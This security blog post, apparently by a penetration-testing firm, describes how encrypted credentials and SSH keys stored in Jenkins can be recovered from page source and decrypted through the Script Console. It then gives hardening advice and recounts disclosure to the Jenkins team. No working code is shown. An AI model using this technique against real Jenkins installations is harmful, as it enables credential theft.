The Security of DevSecOps - Jenkins
Jenkins is an open source application which is nearly always targeted by attackers, but is also incredibly useful when used legitimately. It can help automate test cases against code bases as code is committed to a repository and report on its status.
So why attack Jenkins? Well, Jenkins usually is not only typically configured to run as SYSTEM on Windows or root on linux systems, but it also has a "Script Console" where you can run commands on the underlying operating system via Jenkins.
We wanted a different look at Jenkins though. In order for Jenkins to work, it has to have access to the source code it is building, right? Well, that means that the credentials are stored somewhere that Jenkins can access. We wanted to figure out where this is.
You can navigate to the Global Credentials section of Jenkins, and see that it shows a redacted version of the password.
However, in a simple 101 trick, why not review the source code? If you look at the source code of this page, you would encounter the following data.
The highlighted text is actually an encrypted form of the password! The next piece of the puzzle is how to decrypt this data to find the cleartext password. Remember the Script Console we talked about earlier? Well it comes into play again here and we can use it to find our cleartext password!
As you can see in the image above, the Groovy console can run the decryption routine and obtain the plaintext password! This attack also applies to SSH keys that are stored within Jenkins.
When Jenkins is configured in this manner, there is typically very little done to protect the Jenkins installation. When we find Jenkins on assessments, it typically is configured with a username and password, but nothing beyond that. Jenkins DOES allow administrators to perform role based permissions and you CAN lock down a Jenkins install. You can take the permissions away from all user accounts (besides the administrator) to access the Script Console. Additionally, you can prevent standard accounts from accessing the Global Credentials page to prevent disclosure of the encrypted authentication data.
FortyNorth Security contacted the Jenkins development team to warn them of the issue prior to giving the DevSecOps talk in October. They had stated that they do not consider it a vulnerability because at that level of access an attacker could likely find another method to access the data.